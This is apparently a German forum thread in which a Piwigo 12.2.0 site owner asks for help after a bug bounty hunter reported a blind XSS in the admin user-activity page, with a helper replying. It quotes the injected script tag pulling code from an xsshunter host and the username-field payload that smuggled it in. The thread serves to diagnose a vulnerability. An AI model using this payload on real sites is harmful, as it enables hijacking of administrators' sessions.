🌍
Deutsch
Hallo
Ich habe eine Meldung bekommen, dass auf meiner Seite mit Piwigo 12.2.0 eine Blind XSS gemacht werden konnte.
Dies habe ich bekommen:
Report Summary
I'm using XSSHunter tool for testing for Blind XSS, and it has been trigered and I got an email that payload has executed.
Vulnerable Page URL: https://<removed>_photos/admin.php?page=user_activity
Vieleicht kann sich dies jemand mit Know-How anschauen.
Danke und Gruss
Chris
Das hat mir ein BugBounty Jäger zukommen lassen.
Wie genau weiss ich auch nicht. Anscheinend hat er das Tool XSSHunter benutzt und auf meiner Seite dieses Skript ausführen können, so dass er die in die Verwaltung rein gekommen ist:
Siehe den Text auf https://v4yne1.xss.ht/ dazu.
<html lang="de" dir="ltr" class=" rzlnaok idc0_338"><head><script async="" src="https://v4yne1.xss.ht/?_=1648818976877"></script>
<meta name="apple-itunes-app" content="app-id=472225196">
<meta charset="utf-8">
<title>Fam.Jeker@gmx.net Piwigo-Fotogalerie :: Piwigo-Verwaltung</title>
<link rel="icon" type="image/svg+xml" href="themes/default/icon/piwigo.org-icon 1.svg">
<link rel="stylesheet" type="text/css" href="admin/themes/default/fonts/open-sans/open-sans.css">
Offline
ich habe gerade noch gesehen, dass sich dieser als user eingeloggt hat
<div class="detail-section">
<div class="detail-item detail-item-1" title="IP">###########</div>
<div class=" detail-item detail-item-2" title="Script">register</div>
<div class="detail-item detail-item-3" title=""><script src=https://v4yne1.xss.ht></script>">"><script src="https://v4yne1.xss.ht"></script></div>
Anscheinend hat er als Benutzernamen das script genommen?? sollte ja aber nicht gehen??? Ich weiss auch nicht
Offline
Ich habe mir das Tool mal angeschaut. Was hat er dir alles in der Mail geschickt? Da könnte auch etwas wie Injection Key drin stehen.
Ich denke mit den Info sollte man einmal im englischen Forum nachschauen, da die Entwickler sich da tummeln.
Sonst währe mal die komplette Mail etwas hilfreicher.
Offline